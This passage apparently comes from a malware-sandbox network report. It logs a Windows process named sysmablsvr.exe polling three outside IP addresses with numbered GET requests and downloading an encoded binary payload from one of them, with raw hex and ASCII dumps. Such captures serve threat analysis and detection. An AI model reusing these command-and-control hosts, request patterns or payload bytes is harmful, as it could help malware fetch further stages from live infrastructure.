                                            Sep 17, 2024 23:09:20.953804970 CEST892INData Raw: 7a 4b 6f ef aa 0f 77 0d 83 34 88 fb 2b 39 5a 33 36 0b 55 78 18 b5 1d 4b 2e 53 bb f5 c3 be 56 56 00 2c 57 3a 42 93 c7 6b 32 e2 64 cf cc 52 86 1c 06 2c 9e 8d b7 ee 5e 48 a8 a0 21 94 c6 90 ca d0 1f 56 f1 78 43 e3 ce 12 f6 83 74 ea b0 80 66 2a cc fe
                                            Data Ascii: zKow4+9Z36UxK.SVV,W:Bk2dR,^H!VxCtf*0Cg:@<)UQp2g~&-Y3>ADZ(G+NH"g[<W5$9{%Yu7seOC{%XIcbc&Ch2?
                                            Sep 17, 2024 23:09:21.039796114 CEST8INData Raw: 1b b5 08 3e b6 9b 0d ab
                                            Data Ascii: >
                                            Sep 17, 2024 23:09:23.163697958 CEST166OUTGET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:09:23.386266947 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:09:23 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                            Sep 17, 2024 23:09:25.442640066 CEST166OUTGET /3 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:09:25.664438009 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:09:25 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                            Sep 17, 2024 23:09:27.692382097 CEST166OUTGET /4 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:09:27.915556908 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:09:27 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                            Sep 17, 2024 23:09:29.942568064 CEST166OUTGET /5 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:09:30.163774967 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:09:30 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                            Sep 17, 2024 23:09:32.192881107 CEST166OUTGET /6 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:09:32.414632082 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:09:32 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.44973877.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:09:35.464857101 CEST163OUTGET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.44974177.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:09:39.241875887 CEST163OUTGET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.44974377.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:09:42.938610077 CEST163OUTGET /3 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.44974477.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:09:46.621805906 CEST163OUTGET /4 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.44974577.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:09:50.351401091 CEST163OUTGET /5 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.44974677.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:09:54.083096027 CEST163OUTGET /6 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.44974891.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:09:58.798137903 CEST166OUTGET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:09:59.523145914 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:09:59 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 12544
                                            Last-Modified: Tue, 17 Sep 2024 16:30:32 GMT
                                            Connection: keep-alive
                                            ETag: "66e9aea8-3100"
                                            Accept-Ranges: bytes
                                            Data Raw: 2a 4b d4 2b 46 6e f7 a8 df 7f b7 00 68 d9 6f f3 b4 ef 0d e8 97 2d 1e 10 47 e5 8f 0d b4 e3 91 12 22 5c 1a ce ee 79 08 99 08 ca 96 c6 60 29 56 61 47 7b 2e 57 2c 4a f6 47 4b 3d 49 ec 3f b3 4a b8 c7 e1 ea 4d 42 4c b9 7e 2b fa 7e ba 1a 5e 3e 5b 39 18 5a 84 0e cb f3 93 bc d6 dc 0f 09 55 06 f9 3e 71 57 1f 01 56 32 cd 1b d1 0c 37 c7 0c 7f b5 17 fc 53 75 5f 46 b5 04 b3 70 02 25 2b 93 ee f2 66 57 1d 3f 9a 83 79 83 c7 a4 c9 c6 68 ac 15 9f 47 6b ae 5c 53 20 bf 7c 08 1b 7b 8e 9c ae c5 4f 9f 2f 84 a3 af c9 55 b3 81 69 62 8c a7 ad 5b 6d 48 f6 01 10 bc 78 4f 7c fe d8 7c 3d dc 7d 19 95 05 f0 93 20 e1 25 af 70 be 36 d4 ec 8e c8 49 65 21 99 24 c5 12 b4 46 90 fe aa e8 6c fa 8e 4e fc da cd 1e 04 3a a3 8a 62 6c 3f 6c fe a0 2c b1 16 1a b3 76 46 7d c9 b4 8e a6 3e f9 64 f0 d2 6c 20 bd c4 b1 38 37 d9 9b 49 c8 88 58 c3 32 b0 a2 f6 a0 63 74 49 42 e1 90 d7 39 c4 a3 fb 41 b9 99 62 87 d8 8d 66 39 91 75 ba d7 69 15 0e b0 8c 31 bf 70 fc c0 36 7b 50 13 2c 53 9d 7d 88 30 3f b3 36 95 c6 c0 b7 ca 56 07 02 88 2a ad 2e ad 94 c4 d0 db 3a [TRUNCATED]
                                            Data Ascii: *K+Fnho-G"\y`)VaG{.W,JGK=I?JMBL~+~^>[9ZU>qWV27Su_Fp%+fW?yhGk\S |{O/Uib[mHxO||=} %p6Ie!$FlN:bl?l,vF}>dl 87IX2ctIB9Abf9ui1p6{P,S}0?6V*.:?.`&T,Fb)PhcX1%UFgKX::=Wg*6R1)y5j[AQ&5LaJ)QD'@X+X-{j ^p[]>LeWI|$ICiwd@g&,C\cXbW_IWx0 ufHlij~PFA4TKD!zV[VNV}$6Jp[<|"Hfm$d9o=x 3j6Wk12LAyL=}IABtckwuq{W2w8y9cd!dSl(?,`)i^H(x|0?C~DUK:tMCr;d|lYie9+X||_#cc2N>a!q'oD==b^aR9=zf*PIQInkWZxB#bS_Y^2*Z&"T?~D~O
                                            Sep 17, 2024 23:09:59.523197889 CEST1236INData Raw: 21 22 e3 3a f8 64 ed d3 d6 31 f1 21 9f b6 49 60 d1 75 52 5e ed 96 2c 17 37 72 75 59 0c 38 aa 2c 14 89 b2 94 d9 b1 c4 bd cb 69 56 13 c2 e6 c2 4e 94 42 4c ab a8 13 37 df f1 30 27 8c df 4b 21 83 34 e8 67 0f 49 3f 73 b3 69 87 e4 53 75 2d 56 b7 3f e5
                                            Data Ascii: !":d1!I`uR^,7ruY8,iVNBL70'K!4gI?siSu-V?e2^(+#;,x{NsU{/>=NOcqHh6mzy~U;)/K</|{.f'O,,<=UjE-mJ,),FTuj0}YGHAWZm`%
                                            Sep 17, 2024 23:09:59.523233891 CEST1236INData Raw: 8c 7b d2 94 10 81 50 02 1b f8 df 9c 7f 20 a6 79 88 80 16 5a 89 90 19 d2 e1 21 c1 03 6c bf ad d8 ca 8d 65 26 17 dd 85 b6 e9 74 10 0a 32 72 30 5e 5e 67 6f d9 b8 a2 0f ab d9 01 62 52 0b 22 28 1c dd ba 4f 78 04 0a 46 20 b2 6c 00 d2 ad 9b 5c 62 8b 2f
                                            Data Ascii: {P yZ!le&t2r0^^gobR"(OxF l\b/{X$5vNXE!`FLNcS^)lQ l-Ts}R;$9DT?b(UGnw,";f+Q6vJ?U<6AQtn\&*8~/bUuq8
                                            Sep 17, 2024 23:09:59.523266077 CEST1236INData Raw: ec 6d 0b 68 66 0c c2 5d 9d 2a ae 94 6f df 44 73 f6 1d c9 bb 43 46 5c a8 84 41 08 ae 20 cd 6a b7 f1 a1 ad f4 8f cd 30 2e 38 77 b2 97 65 2d a5 44 ec b4 3b 2b 85 ef 49 41 9f 20 4c e0 76 6d d2 4d 78 9f b7 09 ee 55 58 52 90 1c 29 02 5a a8 4d 8b bc 8a
                                            Data Ascii: mhf]*oDsCF\A j0.8we-D;+IA LvmMxUXR)ZMDBY[A1dG5!j|Gb&v2]G\BspIQqTi3&ys?ok`Y{5*Va'NX^~s/.^[o3(]G9F]cPIT\+2n^a(`
                                            Sep 17, 2024 23:09:59.523300886 CEST1236INData Raw: 10 0d 0b b9 5f 9d 6d e6 92 57 24 32 d1 17 e9 b2 d9 ae 0d 71 a1 d0 f5 93 db 74 24 44 1d 9c e2 88 95 42 43 e3 6d 72 fc 78 0b 0c 45 d3 b3 36 15 f1 98 ab 5f 59 68 bb c4 59 ff aa da 7d a2 ad c0 0d 7b 82 2d 3b 08 0f 12 be 08 9a 06 81 47 b2 42 9b 80 69
                                            Data Ascii: _mW$2qt$DBCmrxE6_YhY}{-;GBiuMPyVE=hEN+kq?<'e>4bcb7Ki<=b"x5V$)VO$&<B0^MgOFzgQTfHO_T1*6vX
                                            Sep 17, 2024 23:09:59.523334026 CEST1236INData Raw: 8a 04 bc 40 2f 0c e0 a9 d6 0a e2 f7 14 8f ae 57 56 3d 2a bf 40 a3 25 fe 65 17 b7 f6 2f da 29 64 e9 6d 89 dc fd a5 6c 7b b4 e5 b8 72 df 7e 9d 10 04 92 d4 19 f1 8d 30 01 70 8c 1d 49 81 05 99 27 00 4f 7d 7a 9d c1 12 6d da 6c 5e f7 bb 5a cd 3d cf 8c
                                            Data Ascii: @/WV=*@%e/)dml{r~0pI'O}zml^Z=ksq#t]ID4CX<Vq/P:_NwB)xJkGC~ua"5I5nKy+Y{?bCI%Xm01:._&u>}@_`T
                                            Sep 17, 2024 23:09:59.523413897 CEST1236INData Raw: 30 57 86 af d6 c6 d3 34 95 3c 80 7e d4 8e 1c 90 01 dd 15 ca 71 10 9c 00 3b 53 0d 8c 64 86 20 42 75 94 c9 97 a4 ac 14 92 66 db cc e6 0b 41 93 bc 48 e3 00 cf 52 69 31 9b 26 f3 80 24 67 53 5d 3c 93 84 ba bb 51 1f 7e 2a d4 23 20 45 21 36 94 89 af 9c
                                            Data Ascii: 0W4<~q;Sd BufAHRi1&$gS]<Q~*# E!6:0x[EP-Xn\fv$4X,.YR:Ev%o)p k WkB6eCt@R`}2WP`YJM$3z?5\ JPql
                                            Sep 17, 2024 23:09:59.523448944 CEST1236INData Raw: f9 22 9d 01 2b fd 11 5a 19 b7 74 3c 7d 58 9a d4 0d e0 14 a2 0d 47 fd c5 51 f2 b7 9a f7 48 65 ed 09 41 ba 81 e1 6c bb df 4d 7f 56 a2 00 f2 66 ff a8 c5 e0 fc 39 3a bc e6 d4 2e fd 2b c0 af c0 29 76 67 bd f2 ec 0e 7c 1d da eb 7b fd b7 62 3a b7 39 f1
                                            Data Ascii: "+Zt<}XGQHeAlMVf9:.+)vg|{b:9&&Qn1MW.Ob+am9W-@;fG@cP=YxuF HH;,TTu,zmDU'?lCk=Sbi@iK\eDw"wV
                                            Sep 17, 2024 23:09:59.523482084 CEST1236INData Raw: 8c c8 46 fd 7c b3 b9 a1 94 a6 7b 4b c1 71 aa e7 a4 be 30 e5 5f 0e 05 16 bc 74 a8 2d 5c 2f 95 72 38 4e e1 76 31 86 be b0 b9 4d c9 83 64 b1 2d 19 3d 98 16 3b 2f 0b ec e9 18 da 39 a9 18 f7 a4 82 1f a4 33 02 ce 29 81 12 bd c3 f7 91 1b 26 27 d1 55 5c
                                            Data Ascii: F|{Kq0_t-\/r8Nv1Md-=;/93)&'U\]JvjS*g4!]ReebGCh+;`4TO{ZVj{726Vij&)q C*(*N|3q.C2&_JcQqGnwR
                                            Sep 17, 2024 23:09:59.523516893 CEST1236INData Raw: 18 3e a6 e8 85 bc a6 54 db 4a 14 bc ac 5a 13 7e 50 e4 f7 f8 90 7e 8e c4 4e d6 4a 50 6c 97 a3 82 31 ec 59 be 4c 6f 38 62 b9 d7 4e 68 c4 e0 fb 81 94 96 eb 34 f8 ef 65 4d 72 0c e4 72 b0 61 ad 02 27 c5 b1 82 5c 94 03 fd 50 45 43 36 7b e0 0c a7 45 e4
                                            Data Ascii: >TJZ~P~NJPl1YLo8bNh4eMrra'\PEC6{E\?&SgIqzEfMCz1U74;B3Q&maoMkjyt'K1H(,TNK#/S|eQ2/f[C]A-Z&QQ>RuvF&0
                                            Sep 17, 2024 23:09:59.528557062 CEST449INData Raw: 27 ce c4 b5 6b ea 96 54 3d fe 4f 4d 3d 18 9a a1 b4 15 32 01 38 10 4e b7 4b ed fb 49 c1 d8 b2 5d 08 75 1d 81 79 d8 fa b0 b2 98 90 35 9e 31 36 5f 4e 44 ef 33 04 01 c4 0a 90 70 41 47 fe 67 04 e6 85 b5 53 5f db c8 6e c0 79 b3 52 d8 7e 01 47 5e d2 91
                                            Data Ascii: 'kT=OM=28NKI]uy516_ND3pAGgS_nyR~G^{43e^W-qMw[~PA)LW!^LczVym_ZAVcYoZx%$[_j2\u\wch~;[E5}uiIj^A


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.44974991.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:10:00.540867090 CEST166OUTGET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:10:01.236260891 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:01 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 12544
                                            Last-Modified: Tue, 17 Sep 2024 16:30:32 GMT
                                            Connection: keep-alive
                                            ETag: "66e9aea8-3100"
                                            Accept-Ranges: bytes
                                            Data Raw: 2a 4b d4 2b 46 6e f7 a8 df 7f b7 00 68 d9 6f f3 b4 ef 0d e8 97 2d 1e 10 47 e5 8f 0d b4 e3 91 12 22 5c 1a ce ee 79 08 99 08 ca 96 c6 60 29 56 61 47 7b 2e 57 2c 4a f6 47 4b 3d 49 ec 3f b3 4a b8 c7 e1 ea 4d 42 4c b9 7e 2b fa 7e ba 1a 5e 3e 5b 39 18 5a 84 0e cb f3 93 bc d6 dc 0f 09 55 06 f9 3e 71 57 1f 01 56 32 cd 1b d1 0c 37 c7 0c 7f b5 17 fc 53 75 5f 46 b5 04 b3 70 02 25 2b 93 ee f2 66 57 1d 3f 9a 83 79 83 c7 a4 c9 c6 68 ac 15 9f 47 6b ae 5c 53 20 bf 7c 08 1b 7b 8e 9c ae c5 4f 9f 2f 84 a3 af c9 55 b3 81 69 62 8c a7 ad 5b 6d 48 f6 01 10 bc 78 4f 7c fe d8 7c 3d dc 7d 19 95 05 f0 93 20 e1 25 af 70 be 36 d4 ec 8e c8 49 65 21 99 24 c5 12 b4 46 90 fe aa e8 6c fa 8e 4e fc da cd 1e 04 3a a3 8a 62 6c 3f 6c fe a0 2c b1 16 1a b3 76 46 7d c9 b4 8e a6 3e f9 64 f0 d2 6c 20 bd c4 b1 38 37 d9 9b 49 c8 88 58 c3 32 b0 a2 f6 a0 63 74 49 42 e1 90 d7 39 c4 a3 fb 41 b9 99 62 87 d8 8d 66 39 91 75 ba d7 69 15 0e b0 8c 31 bf 70 fc c0 36 7b 50 13 2c 53 9d 7d 88 30 3f b3 36 95 c6 c0 b7 ca 56 07 02 88 2a ad 2e ad 94 c4 d0 db 3a [TRUNCATED]
